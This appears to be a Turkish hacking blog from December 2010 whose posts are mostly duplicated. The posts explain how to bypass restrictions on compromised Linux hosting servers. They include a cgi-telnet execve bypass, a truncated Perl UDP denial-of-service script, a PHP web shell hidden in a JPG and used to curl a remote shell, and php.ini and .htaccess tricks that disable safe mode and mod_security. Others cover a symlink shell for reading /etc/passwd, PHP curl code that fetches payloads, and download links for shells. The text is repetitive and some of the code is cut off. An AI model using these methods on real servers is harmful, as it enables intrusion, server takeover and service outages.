16 Aralık 2010 Perşembe

lscgid: execve() permission cgi-telnet linux bypass

genelde linux sunucularda  safe mode : on  - disable function ne var ne yok kapalı olur.. bu gibi durumlarda yardımımıza bir zamanların gözde hack aracı olan cgi-telnet adlı  Rohitab Batra üstadımızın yazdıgı yazılım yetişir. fakat bu cgi-telnet iyice duyulmaya başlayınca hosting sahipleri degerleri webmaster arkadaşlarımız bir takım kendine göre önlemler almışlardır, bunların en dikkat çekeni   lscgid: execve() :/home/sikis/public_html/cgiege.pl: Permission denied  engelidir.. şimdi bu   engeli nasıl aşabilcegimizi 1 örnekleme ile size sunucagım.. 

Elimizde bir cgitelnet var sayalım veya olmayanalar cgi-telnet bu sayfadan indirebilirler..
Cgi-telnet shellimizin 1. satırına bakıyoruz..
#!/usr/bin/perl yazıyor bunu #!/usr/local/bin/perl olarak 
degiştirip kaydediyoruz sonra bypass yapmak istedigimiz hedef 
sunucumuza atıp  chmod 755 işlemimizi uyguladıktan sonra cgi 
sayfamıza giriyoruz 
lscgid: execve():/home/users/public_html/cgiege.pl: Permission denied 
Bypass fuck :D:D
 
BİR TŞK VEYA YORUMU ÇOK GÖRMEZSİNİZ ARTIK DİMİ ?

lscgid: execve() permission cgi-telnet linux bypass

genelde linux sunucularda  safe mode : on  - disable function ne var ne yok kapalı olur.. bu gibi durumlarda yardımımıza bir zamanların gözde hack aracı olan cgi-telnet adlı  Rohitab Batra üstadımızın yazdıgı yazılım yetişir. fakat bu cgi-telnet iyice duyulmaya başlayınca hosting sahipleri degerleri webmaster arkadaşlarımız bir takım kendine göre önlemler almışlardır, bunların en dikkat çekeni   lscgid: execve() :/home/sikis/public_html/cgiege.pl: Permission denied  engelidir.. şimdi bu   engeli nasıl aşabilcegimizi 1 örnekleme ile size sunucagım.. 

Elimizde bir cgitelnet var sayalım veya olmayanalar cgi-telnet bu sayfadan indirebilirler..
Cgi-telnet shellimizin 1. satırına bakıyoruz..
#!/usr/bin/perl yazıyor bunu #!/usr/local/bin/perl olarak 
degiştirip kaydediyoruz sonra bypass yapmak istedigimiz hedef 
sunucumuza atıp  chmod 755 işlemimizi uyguladıktan sonra cgi 
sayfamıza giriyoruz 
lscgid: execve():/home/users/public_html/cgiege.pl: Permission denied 
Bypass fuck :D:D
 
BİR TŞK VEYA YORUMU ÇOK GÖRMEZSİNİZ ARTIK DİMİ ?

12 Aralık 2010 Pazar

Windows Udp Dos Attack..

bu perl ile kodlanmış ufak script windows sunucuları kapatmakta oldukça etkilidir.. saldıracagınız hedef sunucuda açık bir porta saldırıyoruz, atıyorum 139 portuna 80 portuna veya 8443 portuna saldırabilirsiniz.. saldırıcagaımız sitenin ip adresini ise başlat > çalıştır > cmd > ping site.com işlemini uyguluyarak ögrenebilirsiniz. Windows Udp Dos Attack..  ddos attack, ddos exploit, ddos perl exploit, ddos script, aşagıda verdigim kodları bir kopyalıyarak bir notaped içine yapıştırın sonra Linux bir sunucuda çalıştırın 

çalıştırma :  perl windows-udp-attack.pl  hedef-sunucu-ip-adres  port  saldırısüresi
                  perl  windows-udp-attack-.pl www.byege.blogspot.com 80 9999 gibi

#!/usr/bin/perl
#####################################################
# Windows Udp Dos Attack..
#
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0

Windows Udp Dos Attack..

bu perl ile kodlanmış ufak script windows sunucuları kapatmakta oldukça etkilidir.. saldıracagınız hedef sunucuda açık bir porta saldırıyoruz, atıyorum 139 portuna 80 portuna veya 8443 portuna saldırabilirsiniz.. saldırıcagaımız sitenin ip adresini ise başlat > çalıştır > cmd > ping site.com işlemini uyguluyarak ögrenebilirsiniz. Windows Udp Dos Attack..  ddos attack, ddos exploit, ddos perl exploit, ddos script, aşagıda verdigim kodları bir kopyalıyarak bir notaped içine yapıştırın sonra Linux bir sunucuda çalıştırın 

çalıştırma :  perl windows-udp-attack.pl  hedef-sunucu-ip-adres  port  saldırısüresi
                  perl  windows-udp-attack-.pl www.byege.blogspot.com 80 9999 gibi

#!/usr/bin/perl
#####################################################
# Windows Udp Dos Attack..
#
######################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
 printf "$0

11 Aralık 2010 Cumartesi

Acil Windows 98 kullanan lazım

Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın

Acil Windows 98 kullanan lazım

Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın

local bypass jpg shell code injection

Her upload yapılabilen sitelerden shell sokamazsınız çogu yer .php uzantıları yasaklar buna karşılık bu shelli kullanabilirsiniz... kesin olarak bu jpg dosyalarını attıgınızda shell sokamazsınız ama işe yaradıgını bizzat kendim test ederek gördüm.. Upload olan siteden sunucumuza verdigim jpg uzantılı shelleri yükleyip  yüklendigi yerleri bulduktan sonra

byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=id
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=ls -lia
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=curl -o shell.php shelladresi.com/shell.txt gibi linux komutları ile shell yüklüyebiliriz..
burda  yapılan işlem resmin içine php kodu saklıyarak ufak bir 4 kb resim dosyasının içindeki  php kodlarla sunucuda code injection yapmaktır bu işlemi yapabilmek içinde Safe Mode : Off  ve  sunucuda system ile passthru fonksionlarının aynı zamanda fopen açık olması lazım..

Dosya Download Link : http://www.dosya.tc/download/UECzwH/ege_jpg_shell.rar.html

Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın

local bypass jpg shell code injection

Her upload yapılabilen sitelerden shell sokamazsınız çogu yer .php uzantıları yasaklar buna karşılık bu shelli kullanabilirsiniz... kesin olarak bu jpg dosyalarını attıgınızda shell sokamazsınız ama işe yaradıgını bizzat kendim test ederek gördüm.. Upload olan siteden sunucumuza verdigim jpg uzantılı shelleri yükleyip  yüklendigi yerleri bulduktan sonra

byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=id
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=ls -lia
byege.blogspot.com/uploadyolu/ege_passthru.jpg?ege=curl -o shell.php shelladresi.com/shell.txt gibi linux komutları ile shell yüklüyebiliriz..
burda  yapılan işlem resmin içine php kodu saklıyarak ufak bir 4 kb resim dosyasının içindeki  php kodlarla sunucuda code injection yapmaktır bu işlemi yapabilmek içinde Safe Mode : Off  ve  sunucuda system ile passthru fonksionlarının aynı zamanda fopen açık olması lazım..

Dosya Download Link : http://www.dosya.tc/download/UECzwH/ege_jpg_shell.rar.html

Windows 98 işletim sistemi kullananlar yorum olarak adresini yazsın

8 Aralık 2010 Çarşamba

tryag shell ve linux sunucu bypass yöntemi

Bu konumdada sizlere pek bilinmiyen ve klasik bir bypass yöntemini anlatacagım, bu bypass yöntemi ilk geliştirdigim zamanlarda %90 Linux Directadmin    Linux Pleks panel   sunucuları bypass edebiliyordum, sizde bu yöntem ile elinize geçen sunucuları kısa ve zaman almıcak bir şekilde bypass edebilirsiniz..

Öncelikle bu aşagıda verdigim kodu php.ini olarak kayıt edip shell soktugumuz sunucuya atıyoruz..

[+] Attack Safe Mode
[+] Attack wrote (Php.ini)
[+] Now go to YOu Shell
[+] Done "; $fp2 = fopen(".htaccess","w+"); fwrite($fp2," SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off "); echo "
[+] Attack Security_Mod
[+] Attack wrote (htaccess)
[+] Now go to YOu Shell
[+] Done "; ?>

Sonra aşagıdaki linkten tryag shellimizi indirip sunucuya atıp bypass yapıyoruz sunucuyu.. takıldıgı veya anlamadıgı yer olan arkadaşlarsorabilirler

http://s2.dosya.tc/file/PORVOT/tryag.rar.html

tryag shell ve linux sunucu bypass yöntemi

Bu konumdada sizlere pek bilinmiyen ve klasik bir bypass yöntemini anlatacagım, bu bypass yöntemi ilk geliştirdigim zamanlarda %90 Linux Directadmin    Linux Pleks panel   sunucuları bypass edebiliyordum, sizde bu yöntem ile elinize geçen sunucuları kısa ve zaman almıcak bir şekilde bypass edebilirsiniz..

Öncelikle bu aşagıda verdigim kodu php.ini olarak kayıt edip shell soktugumuz sunucuya atıyoruz..

[+] Attack Safe Mode
[+] Attack wrote (Php.ini)
[+] Now go to YOu Shell
[+] Done "; $fp2 = fopen(".htaccess","w+"); fwrite($fp2," SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off "); echo "
[+] Attack Security_Mod
[+] Attack wrote (htaccess)
[+] Now go to YOu Shell
[+] Done "; ?>

Sonra aşagıdaki linkten tryag shellimizi indirip sunucuya atıp bypass yapıyoruz sunucuyu.. takıldıgı veya anlamadıgı yer olan arkadaşlarsorabilirler

http://s2.dosya.tc/file/PORVOT/tryag.rar.html

php.ini bypass

php.ini ile sunucuda kapalı olan bir fonksionu aktif etmek  " shell_exec = true " gibi yapılabilir..

örnek : "symlink() = true" tırnak işaretleri yok  bu kodu bir php.ini dosyasına koyup shell olan sunucuya attıgımızda  symlink fonksionu sunucuda aktif oluyor.. sonra bu  symlink bypass shell konumda paylastıgım shelli sunucuya atıp bypass yapabilirsiniz..

php.ini bypass

php.ini ile sunucuda kapalı olan bir fonksionu aktif etmek  " shell_exec = true " gibi yapılabilir..

örnek : "symlink() = true" tırnak işaretleri yok  bu kodu bir php.ini dosyasına koyup shell olan sunucuya attıgımızda  symlink fonksionu sunucuda aktif oluyor.. sonra bu  symlink bypass shell konumda paylastıgım shelli sunucuya atıp bypass yapabilirsiniz..

symlink bypass shell

 Paylasmıs oldugum bu shelli symlink.php olarak kayıt edip bypass yapmak istediginiz sunucuya atın sonra örnek olarak /etc/passwd  kullanıcı dizimini çekin... selametle.

indir linki :
http://s2.dosya.tc/file/4BhgoW/symlink.rar.html

symlink bypass shell

 Paylasmıs oldugum bu shelli symlink.php olarak kayıt edip bypass yapmak istediginiz sunucuya atın sonra örnek olarak /etc/passwd  kullanıcı dizimini çekin... selametle.

indir linki :
http://s2.dosya.tc/file/4BhgoW/symlink.rar.html

Eval code disable function wget bypass

Aşagıda verdigim eval code ile Safe mode on ve wget v.s türü uygulamaların engelli olup curl aktif oldugu sunucularda dosya yükleme yapabilirsiniz..

$curl = curl_init("http://www.dosyasitesi.com/safemodefuck.tar.gz");
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_VERBOSE, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($curl);
curl_close($curl);
$dosya = fopen("safemodefuck.tar.gz", "a+");
fwrite($dosya, $output);
fclose($dosya);

Eval code disable function wget bypass

Aşagıda verdigim eval code ile Safe mode on ve wget v.s türü uygulamaların engelli olup curl aktif oldugu sunucularda dosya yükleme yapabilirsiniz..

$curl = curl_init("http://www.dosyasitesi.com/safemodefuck.tar.gz");
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_VERBOSE, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($curl);
curl_close($curl);
$dosya = fopen("safemodefuck.tar.gz", "a+");
fwrite($dosya, $output);
fclose($dosya);